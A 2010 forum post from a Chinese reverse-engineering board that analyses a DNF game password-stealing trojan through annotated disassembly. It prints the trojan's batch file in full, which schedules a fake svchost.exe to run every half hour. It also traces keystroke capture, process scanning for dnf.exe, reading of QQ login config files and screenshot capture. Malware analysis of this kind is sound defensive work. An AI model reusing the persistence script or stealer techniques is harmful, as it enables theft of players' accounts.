吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 60040|回复: 48
收起左侧

[PC样本分析] DNF盗号木马分析 by 当红小生[LSG]

  [复制链接]
hixiaosheng 发表于 2010-3-8 18:41
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 是昔流芳 于 2011-2-11 12:19 编辑

本篇幅比较长就不自我介绍了。。。大体分2部分,预知详情,请看下文!
7339EDA9 . 50 push eax ; /pVersionInformation
7339EDAA . 33FF xor edi,edi ; |
7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
7339EDBC . 33C0 xor eax,eax
......
7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service Pack
7339EE2A . 50 push eax

00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
004068B4 52 push edx
004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
004068E7 50 push eax
004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068F3 8BD0 mov edx,eax
004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove

00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
00406BAB 50 push eax
00406BAC 68 3C334000 push 脱壳后.0040333C
00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
00406BB7 8BF0 mov esi,eax
00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BBC F7DE neg esi
00406BBE 1BF6 sbb esi,esi
00406BC0 46 inc esi
00406BC1 F7DE neg esi
00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr

733BD096 . 51 push ecx ; /pLocalFileTime
733BD097 . 50 push eax ; |pFileTime
733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
733BD09E . 85C0 test eax,eax
733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
733BD0AE . 52 push edx ; /pSystemTime
733BD0AF . 50 push eax ; |pFileTime
733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime

0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
00410062 33FF xor edi,edi
00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00410067 897D EC mov dword ptr ss:[ebp-14],edi
0041006A 897D DC mov dword ptr ss:[ebp-24],edi
0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator")
00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
00410086 50 push eax
00410087 6A 01 push 1
00410089 6A FF push -1
0041008B 68 20010000 push 120
00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
00410092 57 push edi
00410093 6A 01 push 1
00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
004100A1 50 push eax
004100A2 6A 01 push 1
004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
004100A7 6A 11 push 11
004100A9 51 push ecx
004100AA 6A 01 push 1
004100AC 68 80000000 push 80
004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
004100B3 83C4 1C add esp,1C
004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
004100B9 6A 01 push 1
004100BB 52 push edx
004100BC 68 244A4000 push 脱壳后.00404A24
004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
004100CD 6A 01 push 1
004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
004100D4 50 push eax
004100D5 6A 02 push 2
004100D7 6A FF push -1
004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)

00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
00407288 6A FF push -1
0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
0040729D 51 push ecx
0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
004072A9 8BD0 mov edx,eax
004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
004072B4 50 push eax
004072B5 6A 01 push 1
004072B7 6A FF push -1
004072B9 6A 02 push 2
004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
{
sc config Schedule start= AUTO
net start schedule
AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
}
=====================================================================(美丽的分割线哇!哇卡卡!!)
00402F43 00 db 00
00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
00402F49 . 0BC0 or eax,eax
00402F4B . 74 02 je short svchost.00402F4F
00402F4D . FFE0 jmp eax
00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00402F59 . FFD0 call eax
00402F5B . FFE0 jmp eax ; user32.FindWindowA
00402F5D 00 db 00
00402F5E 00 db 00

00403034   nbsp; A1 20574100   mov eax,dword ptr ds:[415720]
00403039   .  0BC0          or eax,eax
0040303B   .  74 02         je short svchost.0040303F
0040303D   .  FFE0          jmp eax
0040303F   >  68 1C304000   push svchost.0040301C                    ;  user32
00403044   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403049   .  FFD0          call eax
0040304B   .  FFE0          jmp eax                                  ;  SendMessageA

0040307C   nbsp; A1 2C574100   mov eax,dword ptr ds:[41572C]
00403081   .  0BC0          or eax,eax
00403083   .  74 02         je short svchost.00403087
00403085   .  FFE0          jmp eax
00403087   >  68 64304000   push svchost.00403064                    ;  
0040308C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403091   .  FFD0          call eax
00403093   .  FFE0          jmp eax                                  ;  RtlMoveMemory

00403114   nbsp; A1 44574100   mov eax,dword ptr ds:[415744]
00403119   .  0BC0          or eax,eax
0040311B   .  74 02         je short svchost.0040311F
0040311D   .  FFE0          jmp eax
0040311F   >  68 FC304000   push svchost.004030FC               ;  
00403124   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
00403129   .  FFD0          call eax
0040312B   .  FFE0          jmp eax                             ;  GetForegroundWindow

0040315C   nbsp; A1 50574100   mov eax,dword ptr ds:[415750]
00403161   .  0BC0          or eax,eax
00403163   .  74 02         je short svchost.00403167
00403165   .  FFE0          jmp eax
00403167   >  68 44314000   push svchost.00403144               ;  user32
0040316C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
00403171   .  FFD0          call eax
00403173   .  FFE0          jmp eax                             ;  GetWindowTextA


0040501F   > \68 FC4F4000   push svchost.00404FFC                    ;  GetClassNameA
00405024   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00405029   .  FFD0          call eax
0040502B   .  FFE0          jmp eax                                  ;  GetClassNameA


0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
004034A1 . 0BC0 or eax,eax
004034A3 . 74 02 je short svchost.004034A7
004034A5 . FFE0 jmp eax
004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
004034B1 . FFD0 call eax
004034B3 . FFE0 jmp eax

0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
00403451 . 0BC0 or eax,eax
00403453 . 74 02 je short svchost.00403457
00403455 . FFE0 jmp eax
00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403461 . FFD0 call eax
00403463 . FFE0 jmp eax

00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
0040354D . FFD0 call eax
0040354F .- FFE0 jmp eax ; user32.SetWindowLongA

00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
00402EA9 . 0BC0 or eax,eax
00402EAB . 74 02 je short svchost.00402EAF
00402EAD . FFE0 jmp eax
00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId

00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
00402EB9 . FFD0 call eax
00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId

00411639 . 6A 03 push 3 ; /varType = Long
0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
0041163E . 33FF xor edi,edi ; |
00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
00411645 . 50 push eax ; |ArrayVar
00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
0041165E . 51 push ecx
0041165F . 57 push edi
00411660 . 68 10040000 push 410
00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
{
004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
004031A5 . 0BC0 or eax,eax
004031A7 . 74 02 je short svchost.004031AB
004031A9 . FFE0 jmp eax
004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
004031B5 . FFD0 call eax
004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
}
0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>

004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
004116B1 . 50 push eax
004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
004116B8 . 8BD0 mov edx,eax
004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
004116CF . 68 F4010000 push 1F4
004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
004116D7 . 51 push ecx
004116D8 . 52 push edx
004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi


00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
00404B2D . 0BC0 or eax,eax
00404B2F . 74 02 je short svchost.00404B33
00404B31 . FFE0 jmp eax
00404B7F   > \68 5C4B4000   push svchost.00404B5C                    ;  EnumProcessModules
00404B84   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00404B89   .  FFD0          call eax
00404B8B   .  FFE0          jmp eax                                  ;  EnumProcessModules


004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy

00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
00403235 . 0BC0 or eax,eax
00403237 . 74 02 je short svchost.0040323B
00403239 . FFE0 jmp eax
0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403245 . FFD0 call eax
00403247 . FFE0 jmp eax

0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C2C2 . 6A 00 push 0
0040C2C4 . 6A FF push -1
0040C2C6 . 6A 01 push 1
0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
0040C2D5 . 50 push eax ; /String8
0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal

0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C328 . 6A 00 push 0
0040C32A . 6A FF push -1
0040C32C . 6A 01 push 1
0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
0040C33B . 52 push edx ; /String8
0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
0040C33F . 50 push eax ; |ARG2
0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal


0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]

00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
00404C79 . FFD0 call eax
00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot

00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404CDD . FFD0 call eax
00404CDF . FFE0 jmp eax ; Process32First

00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404D25 . FFD0 call eax
00404D27 .- FFE0 jmp eax ; kernel32.Process32Next

0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
0040C6A1 . 0F84 62240000 je svchost.0040EB09 这个是判断是否有DNF.exe
0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4


004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403505 . FFD0 call eax
00403507 . FFE0 jmp eax


733A03F6    BB B8A63A73     mov ebx,msvbvm60.733AA6B8             ; ThunderRT6Main   
733A03FB    50              push eax
733A03FC    53              push ebx
733A03FD    FF35 D0064A73   push dword ptr ds:[734A06D0]          ; msvbvm60.73390000
733A0403    FF15 F8123973   call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
733A0409    33F6            xor esi,esi
733A040B    85C0            test eax,eax
733A040D    75 71           jnz short msvbvm60.733A0480
733A040F    6A 0C           push 0C
733A0411    8D7D CC         lea edi,dword ptr ss:[ebp-34]
733A0414    59              pop ecx
733A0415    6A 01           push 1
733A0417    FF35 D4064A73   push dword ptr ds:[734A06D4]          ; svchost.00400000

733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
733A1313 . 68 55133A73 push msvbvm60.733A1355
733A1318 . 57 push edi
733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B

004035D0   nbsp; A1 D4574100   mov eax,dword ptr ds:[4157D4]
004035D5   .  0BC0          or eax,eax
004035D7   .  74 02         je short svchost.004035DB
004035D9   .  FFE0          jmp eax
004035DB   >  68 B8354000   push svchost.004035B8                    ;  user32
004035E0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004035E5   .  FFD0          call eax
004035E7   .  FFE0          jmp eax                                  ;  GetWindowTextLengthW

0040364D   .  0BC0          or eax,eax
0040364F   .  74 02         je short svchost.00403653
00403651   .  FFE0          jmp eax
00403653   >  68 30364000   push svchost.00403630                    ;  user32
00403658   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
0040365D   .  FFD0          call eax
0040365F   .  FFE0          jmp eax                                  ;  GetKeyState

00403690   nbsp; A1 EC574100   mov eax,dword ptr ds:[4157EC]
00403695   .  0BC0          or eax,eax
00403697   .  74 02         je short svchost.0040369B
00403699   .  FFE0          jmp eax
0040369B   >  68 78364000   push svchost.00403678                    ;  user32
004036A0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004036A5   .  FFD0          call eax
004036A7   .  FFE0          jmp eax                                  ;  MapVirtualKeyA

7340CEF2 |. 56 push esi ; /lParam
7340CEF3 |. FF75 0C push [arg.2] ; |wParam
7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx

004033B0   nbsp; A1 80574100   mov eax,dword ptr ds:[415780]
004033B5   .  0BC0          or eax,eax
004033B7   .  74 02         je short svchost.004033BB
004033B9   .  FFE0          jmp eax
004033BB   >  68 98334000   push svchost.00403398                    ;  user32
004033C0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004033C5   .  FFD0          call eax
004033C7   .  FFE0          jmp eax                                  ;  GetDC


733A1BAF . 57 push edi ; /hDC => NULL
733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
733A1BB6 . 3BC7 cmp eax,edi
733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
733A1BC6 . 50 push eax ; |hDC
733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject

004059AB   > \68 88594000   push svchost.00405988                    ;  GDIPlus
004059B0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004059B5   .  FFD0          call eax
004059B7   .  FFE0          jmp eax                                  ;  GdipSaveImageToFile


0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
0040D52F . 6A 00 push 0
0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
0040D534 . 52 push edx


00411B52 . 68 305C4000 push svchost.00405C30 ; Write
00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
00411B5D . 53 push ebx
00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
00411B69 . 51 push ecx
00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
00411B70 . 52 push edx
00411B71 . FFD7 call edi
